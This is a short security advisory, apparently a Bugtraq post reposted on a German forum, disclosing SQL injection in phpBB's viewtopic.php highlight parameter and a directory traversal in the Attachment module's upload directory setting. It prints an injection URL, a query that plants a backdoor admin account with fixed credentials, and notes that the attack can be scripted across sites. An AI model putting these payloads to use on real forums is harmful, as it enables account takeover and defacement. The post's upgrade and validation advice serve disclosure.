Code: Alles auswählen
From: zee@psybnc.it
To: bugtraq@securityfocus.com
Subject: Phpbb id: 10701 update and Attachmodule add-on Directory Traversal
Phpbb: All vulnerable all except 2.0.11
Attachment module: All version vulnerable
Howdark update opened wide my eyes with his nice exploit:
Bugtraq id: 10701
-----
viewtopic.php?t=1&highlight=%2527
-----
Looking at the code I saw that was possible inject any type of Sql query with a multiple char() functions.
The following code can add an username with admin rights executing this query:
INSERT INTO phpbb_users(user_id,user_active,username,user_password,user_level) VALUES ('99999','1','ze3lock','ba3c83348bddf7b368b478ac06d3340e','1')
And will be added to phpbb_users a new user with admin rights.
*Note we can only execute a working query if we know the tables name. If not we can't. So this work only with a standard installation (usually 95% of websites ;-)
username: ze3lock
pass: thepass
The exploit can be run without being logged in and then you can have access with username. So it's quite simple to make it part of a script that could make backdoors around the web.
For make it working just use the id of a working thread (in this case the thread is 30 - you can see it from the message)
--- Code start ----
http://site.com/forum/viewtopic.php?t=30&highlight=%2527%252emysql_query.....usw.....usw.....usw....
--- code end ---
------------ Attach Module ----------------
In the attach module, I found a directory traversal in the "UPLOAD_DIR" field.
This is the directory where all attachments are supposted to be uploaded.
The field accept any kind of character so you can put instead of 'files' '../../' and all the attachments will be uploaded in the '../..? directory.
That's really dangerous for defacements threat.
--------------- Suggestion ------------------
Please, upgrade to version 2.0.11 and add an input validation to UPLOAD_DIR field in attach module.
Zeelock
AcydBurn ist der Entwickler des Mods